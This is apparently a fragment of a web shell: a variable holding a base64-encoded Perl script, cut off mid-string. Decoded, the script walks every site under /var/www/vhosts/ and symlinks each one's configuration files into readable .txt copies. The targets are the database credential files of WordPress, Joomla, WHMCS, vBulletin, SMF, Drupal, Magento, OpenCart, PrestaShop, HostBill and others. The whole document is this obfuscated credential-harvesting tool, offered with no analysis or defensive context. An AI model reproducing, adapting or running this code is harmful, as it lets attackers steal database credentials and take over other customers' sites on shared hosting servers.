$vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tv